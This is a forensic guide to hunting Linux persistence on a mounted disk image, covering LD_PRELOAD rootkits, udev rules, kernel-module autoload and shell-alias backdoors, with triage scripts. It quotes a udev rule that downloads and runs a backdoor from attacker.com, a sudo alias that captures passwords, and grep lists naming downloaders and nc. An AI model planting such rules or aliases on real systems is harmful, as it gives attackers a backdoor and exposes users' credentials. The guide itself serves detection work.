Artifact Analysis: Advanced Linux Persistence & Rootkits

1. Userland Rootkits: The LD_PRELOAD Hijack

The most common technique for achieving stealth without requiring kernel-level access is User-Mode Hooking via dynamic linker hijacking.

In Linux, the environment variable LD_PRELOAD or the global configuration file /etc/ld.so.preload instructs the dynamic linker to load a specific shared object (.so library) before any other library, including the standard C library (libc).

The Attack Mechanism: An attacker drops a malicious shared library and registers it in /etc/ld.so.preload. This malicious library intercepts (hooks) standard library functions such as readdir (used by ls) or fopen (used by cat). When a system administrator types ls, the attacker’s readdir function executes first. It calls the legitimate readdir, removes the directory entry that matches the malware’s filename, and returns the scrubbed list to the administrator. The malware becomes entirely invisible to user-space tools that rely on the hooked functions.

DFIR Offline Triage: Assuming the forensic image is mounted at /mnt/analysis/:

hunt_ld_preload.sh
# Check if the global preload file exists and contains entries
cat /mnt/analysis/etc/ld.so.preload
# /proc is not part of a disk image (it only holds live state such as /proc/*/environ),
# so hunt for LD_PRELOAD in the persistent places an environment variable can be set from
grep -rn "LD_PRELOAD" /mnt/analysis/etc/environment /mnt/analysis/etc/profile /mnt/analysis/etc/profile.d/ \
    /mnt/analysis/etc/bash.bashrc /mnt/analysis/etc/systemd/system/ 2>/dev/null
grep -n "LD_PRELOAD" /mnt/analysis/root/.*rc /mnt/analysis/root/.*profile /mnt/analysis/home/*/.*rc /mnt/analysis/home/*/.*profile 2>/dev/null

Red Flag: The /etc/ld.so.preload file is empty or non-existent on 99% of healthy Linux systems. Any entry within this file must be treated as a severe Indicator of Compromise (IOC).
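The following shell script is an added example, not code from the original page: it goes one step past `cat` by triaging each library that /etc/ld.so.preload names on a mounted image. For every entry it checks whether the file exists on the image, whether it lives in a standard library directory, and whether an installed package claims the path. Package ownership is taken from the image's dpkg metadata (/var/lib/dpkg/info/*.list); that is an assumption of this example, and rpm-based images would need the rpm database instead. The sample image it builds under a temporary directory is constructed for the example and contains no real indicators.

```shell
#!/bin/sh
# Added example (not from the original page): offline triage of /etc/ld.so.preload on a
# mounted forensic image. For each library the file names, report whether it exists on the
# image, whether it lives in a standard library directory, and whether an installed dpkg
# package claims the path (the path appears in /var/lib/dpkg/info/*.list).
# Assumption: Debian-style dpkg metadata; on rpm-based images substitute the rpm database.

# Usage: triage_ld_preload <image_root>
# Prints one line per entry: "<OK|MISSING|UNPACKAGED|SUSPICIOUS> <path>",
# or "NONE" when the preload file is absent or empty (the healthy state).
triage_ld_preload() {
    root="$1"
    preload="$root/etc/ld.so.preload"
    if [ ! -s "$preload" ]; then
        echo "NONE"
        return 0
    fi
    # Entries are whitespace-separated; drop anything after '#' so a trailing
    # comment does not turn into a bogus path.
    sed 's/#.*//' "$preload" | tr -s ' \t\r\n' '\n' | grep -v '^$' | while read -r lib; do
        if [ ! -e "$root$lib" ]; then
            echo "MISSING $lib"
            continue
        fi
        case "$lib" in
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) in_std_dir=1 ;;
            *) in_std_dir=0 ;;
        esac
        # -x: whole-line match, -F: literal string, so "libc.so.6" cannot match a longer path
        if grep -qxF "$lib" "$root"/var/lib/dpkg/info/*.list 2>/dev/null; then
            echo "OK $lib"              # package-owned: lowest concern, still worth a hash check
        elif [ "$in_std_dir" -eq 1 ]; then
            echo "UNPACKAGED $lib"      # hand-installed into a system library directory
        else
            echo "SUSPICIOUS $lib"      # unowned and outside every library directory
        fi
    done
}

# Builds a constructed sample image under a temporary directory and prints its path.
# Every path and name below is invented for this example.
build_preload_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/usr/lib/x86_64-linux-gnu" "$root/tmp/.cache" \
             "$root/var/lib/dpkg/info"
    touch "$root/usr/lib/x86_64-linux-gnu/libgood.so.0" \
          "$root/usr/lib/libunowned.so" \
          "$root/tmp/.cache/libhide.so"
    echo "/usr/lib/x86_64-linux-gnu/libgood.so.0" > "$root/var/lib/dpkg/info/libgood0.list"
    cat > "$root/etc/ld.so.preload" <<'EOF'
/usr/lib/x86_64-linux-gnu/libgood.so.0
/usr/lib/libunowned.so   # hand-installed
/tmp/.cache/libhide.so
/usr/lib/libgone.so
EOF
    echo "$root"
}

# Stand-alone run: triage the constructed image.
triage_ld_preload "$(build_preload_sample)"
```

Run it against a real image with `triage_ld_preload /mnt/analysis`. An entry is worth attention whatever its verdict, since a healthy system has no entries at all; the verdicts only order the follow-up, with SUSPICIOUS and MISSING (a library that was cleaned up but left the hook registered) examined first.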

2. Event-Triggered Persistence: Udev Rules

Udev is the device manager for the Linux kernel. It utilizes rules to dictate what actions the OS should take when hardware events occur (e.g., plugging in a USB drive, or initializing a network interface).

Threat actors abuse this mechanism to trigger payloads asynchronously, avoiding traditional boot-sequence analysis.

  • The Attack: The adversary creates a malicious rule inside /etc/udev/rules.d/ or /lib/udev/rules.d/.
  • The Payload: ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/bin/wget http://attacker.com/backdoor.sh -O /tmp/x; sh /tmp/x"
  • Forensic Value: This rule ensures that whenever a network interface comes online, the backdoor is automatically downloaded and executed. Analysts must explicitly grep for the RUN+= directive within the udev directories.
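As an added example (not code from the original page), the script below implements the grep the section calls for and scores what it finds. Every rule line carrying a RUN or RUN{program} directive is listed; a command that fetches from the network or executes from a user-writable location is marked HIGH, everything else REVIEW, because a legitimate RUN directive still deserves a look. The rule directories and the heuristic keyword list are assumptions of the example; the benign vendor-style rule in the sample is constructed, and the malicious rule is the one quoted on this page.

```shell
#!/bin/sh
# Added example (not from the original page): offline triage of udev rules on a mounted
# forensic image. Lists every RUN / RUN{program} directive and scores the command it runs.
# Assumption: rules live in etc/udev/rules.d, lib/udev/rules.d and usr/lib/udev/rules.d.

# Usage: triage_udev_rules <image_root>
# Output: "<HIGH|REVIEW> <file>:<line>: <command>" per directive found
triage_udev_rules() {
    root="$1"
    for dir in etc/udev/rules.d lib/udev/rules.d usr/lib/udev/rules.d; do
        [ -d "$root/$dir" ] || continue
        # Only lines where RUN appears before any '#' (commented-out rules do nothing);
        # -H forces the filename prefix even when a single file matches.
        grep -HnE '^[^#]*RUN([{]program[}])?[+]?=' "$root/$dir"/*.rules 2>/dev/null || true
    done | while IFS= read -r hit; do
        file=${hit%%:*}; rest=${hit#*:}
        line=${rest%%:*}; content=${rest#*:}
        # Pull the quoted command out of the directive
        cmd=$(printf '%s\n' "$content" | sed -nE 's/.*RUN([{]program[}])?[+]?="([^"]*)".*/\2/p')
        case "$cmd" in
            # downloaders, pipes into a shell, or anything run from a writable staging area
            *wget*|*curl*|*"nc "*|*ncat*|*"sh -c"*|*base64*|*/tmp/*|*/var/tmp/*|*/dev/shm/*|*/home/*)
                verdict=HIGH ;;
            *) verdict=REVIEW ;;
        esac
        echo "$verdict ${file#"$root"}:$line: $cmd"
    done
}

# Builds a constructed sample image with one vendor-style rule and the rule from this page.
build_udev_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/udev/rules.d" "$root/lib/udev/rules.d"
    cat > "$root/lib/udev/rules.d/99-sysctl.rules" <<'EOF'
# constructed vendor rule: apply per-interface sysctl settings when a NIC appears
ACTION=="add", SUBSYSTEM=="net", KERNEL!="lo", RUN+="/lib/systemd/systemd-sysctl --prefix=/net/ipv4/conf/$name"
EOF
    cat > "$root/etc/udev/rules.d/85-update.rules" <<'EOF'
ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/bin/wget http://attacker.com/backdoor.sh -O /tmp/x; sh /tmp/x"
EOF
    echo "$root"
}

# Stand-alone run: triage the constructed image.
triage_udev_rules "$(build_udev_sample)"
```

The REVIEW bucket is deliberately noisy: distributions ship a handful of RUN directives, so the useful comparison is the list from the image against the list from a known-good install of the same release. PROGRAM= and IMPORT{program}= also execute commands and can be added to the grep pattern the same way.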

3. Ring 0 Persistence: Kernel Modules & eBPF

When threat actors gain root access, they frequently attempt to load code directly into the kernel, achieving ultimate system dominance.

Attackers compile a malicious .ko (Kernel Object) file, a Loadable Kernel Module (LKM), and load it using insmod or modprobe. An LKM can manipulate core kernel structures (like the System Call Table) to hide processes from the kernel’s own task list, bypass iptables firewalls entirely, and grant hidden root shells.

  • Offline Hunting: To survive reboots, LKMs must be registered in the startup configuration. Analysts must audit:
    • /mnt/analysis/etc/modules
    • /mnt/analysis/etc/modules-load.d/
    • /mnt/analysis/etc/modprobe.d/
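The script below is an added example, not code from the original page, covering the three locations in the list above. Module names requested in /etc/modules and /etc/modules-load.d/*.conf are checked against the module index (modules.dep and modules.builtin) of every kernel installed on the image, so a requested module that no kernel ships stands out as UNKNOWN, which is what a hand-dropped .ko looks like from disk. It also lists install directives in /etc/modprobe.d, since those replace module loading with an arbitrary command. The /lib/modules/<version>/ layout is assumed, and the sample image, including its module names, is constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original page): offline audit of kernel-module autoload
# configuration on a mounted forensic image.
# Assumption: standard /lib/modules/<version>/modules.dep and modules.builtin index files.

# Normalise a module name: modprobe treats '-' and '_' as the same character.
norm() { printf '%s\n' "$1" | tr '-' '_'; }

# Usage: list_requested_modules <image_root>  -> one requested module name per line
list_requested_modules() {
    root="$1"
    cat "$root/etc/modules" "$root"/etc/modules-load.d/*.conf 2>/dev/null |
        sed 's/#.*//; s/^[[:space:]]*//; s/[[:space:]]*$//' | grep -v '^$' | sort -u
}

# Usage: audit_module_autoload <image_root>
# Output: "<KNOWN|UNKNOWN> <module>" per requested module, then
#         "INSTALL <file>:<line>:<directive>" for every install line in modprobe.d
audit_module_autoload() {
    root="$1"
    # Build the set of module basenames shipped by any installed kernel
    index=$(mktemp)
    for f in "$root"/lib/modules/*/modules.dep "$root"/lib/modules/*/modules.builtin; do
        [ -f "$f" ] || continue
        # keep the path before ':' (modules.dep lists dependencies after it),
        # then reduce it to the basename without .ko / .ko.xz / .ko.zst
        sed 's/:.*//' "$f" | sed 's#.*/##; s/\.ko.*$//' | tr '-' '_'
    done | sort -u > "$index"
    list_requested_modules "$root" | while read -r mod; do
        if grep -qxF "$(norm "$mod")" "$index"; then
            echo "KNOWN $mod"
        else
            echo "UNKNOWN $mod"      # no installed kernel ships it: where would it load from?
        fi
    done
    # 'install <module> <command>' runs <command> instead of loading the module
    grep -Hn '^[[:space:]]*install[[:space:]]' "$root"/etc/modprobe.d/*.conf 2>/dev/null |
        while IFS= read -r hit; do
            file=${hit%%:*}; rest=${hit#*:}
            echo "INSTALL ${file#"$root"}:$rest"
        done
    rm -f "$index"
}

# Builds a constructed sample image (one kernel, a small module index) and prints its path.
build_modules_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/modules-load.d" "$root/etc/modprobe.d" "$root/lib/modules/6.1.0-example"
    cat > "$root/lib/modules/6.1.0-example/modules.dep" <<'EOF'
kernel/drivers/net/dummy.ko.xz:
kernel/net/ipv4/ip_tables.ko.xz: kernel/net/netfilter/x_tables.ko.xz
kernel/net/netfilter/x_tables.ko.xz:
EOF
    printf 'kernel/fs/ext4/ext4.ko\n' > "$root/lib/modules/6.1.0-example/modules.builtin"
    printf '# /etc/modules: kernel modules to load at boot time.\ndummy\n' > "$root/etc/modules"
    printf 'ip-tables\ndiag_helper   # constructed name, shipped by no kernel\n' > "$root/etc/modules-load.d/local.conf"
    printf '# constructed: replaces loading of ext4 with a command\ninstall ext4 /usr/bin/true\n' > "$root/etc/modprobe.d/local.conf"
    echo "$root"
}

# Stand-alone run: audit the constructed image.
audit_module_autoload "$(build_modules_sample)"
```

UNKNOWN is a lead, not a verdict: a module may also come from a DKMS build or a vendor driver package, in which case the .ko should still be findable under /lib/modules on the image and owned by a package. A module requested for autoload with no corresponding file anywhere on disk, or one whose only home is a directory such as /tmp, is the case the section describes.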

Extended Berkeley Packet Filter (eBPF) allows safe execution of sandboxed programs within the kernel without loading an LKM. By 2025/2026, sophisticated malware families (like BPFDoor or Symbiote) have shifted to eBPF. Attackers use eBPF to filter network packets before they ever reach the firewall, creating invisible “magic packet” triggers that spawn root shells only when a specific, crafted packet hits the network interface.

4. User-Level Persistence: Shell Initialization Scripts

Stealthy persistence does not always require root privileges. Attackers often establish backdoors within a specific user’s interactive environment.

By modifying shell initialization scripts (e.g., ~/.bashrc, ~/.bash_profile, ~/.zshrc), attackers can create malicious aliases or functions.

  • Example Attack: alias sudo='sudo /tmp/.hidden_stealer.sh'
  • The Result: The next time the compromised user attempts to run a privileged command, the attacker’s script intercepts the cleartext password before passing it to the legitimate sudo binary.

audit_advanced_persistence.sh
#!/bin/bash
# Offline audit of a mounted forensic image; TARGET_DIR is the mount point.
TARGET_DIR="/mnt/analysis"

echo "[+] Auditing LD_PRELOAD..."
if [ -f "$TARGET_DIR/etc/ld.so.preload" ]; then
    echo "ALERT: ld.so.preload exists! Contents:"
    cat "$TARGET_DIR/etc/ld.so.preload"
fi

echo "[+] Auditing Udev Rules for execution directives..."
# /usr/lib/udev/rules.d is the vendor location on merged-/usr systems, where /lib is a symlink to it
grep -rn "RUN+=" "$TARGET_DIR/etc/udev/rules.d/" "$TARGET_DIR/lib/udev/rules.d/" "$TARGET_DIR/usr/lib/udev/rules.d/" 2>/dev/null

echo "[+] Auditing LKM auto-load configurations..."
ls -la "$TARGET_DIR/etc/modules-load.d/" 2>/dev/null
grep -v "^#" "$TARGET_DIR/etc/modules" 2>/dev/null
grep -hv "^#" "$TARGET_DIR"/etc/modules-load.d/*.conf 2>/dev/null
# 'install' lines in modprobe.d run an arbitrary command instead of loading the module
grep -rn "^install" "$TARGET_DIR/etc/modprobe.d/" 2>/dev/null

echo "[+] Auditing shell initialization files for aliases or functions shadowing privileged commands..."
grep -nE "alias (sudo|su|ssh|passwd)=|^(sudo|su|ssh|passwd) *\(\)" \
    "$TARGET_DIR"/root/.bashrc "$TARGET_DIR"/root/.bash_profile "$TARGET_DIR"/root/.zshrc \
    "$TARGET_DIR"/home/*/.bashrc "$TARGET_DIR"/home/*/.bash_profile "$TARGET_DIR"/home/*/.zshrc 2>/dev/null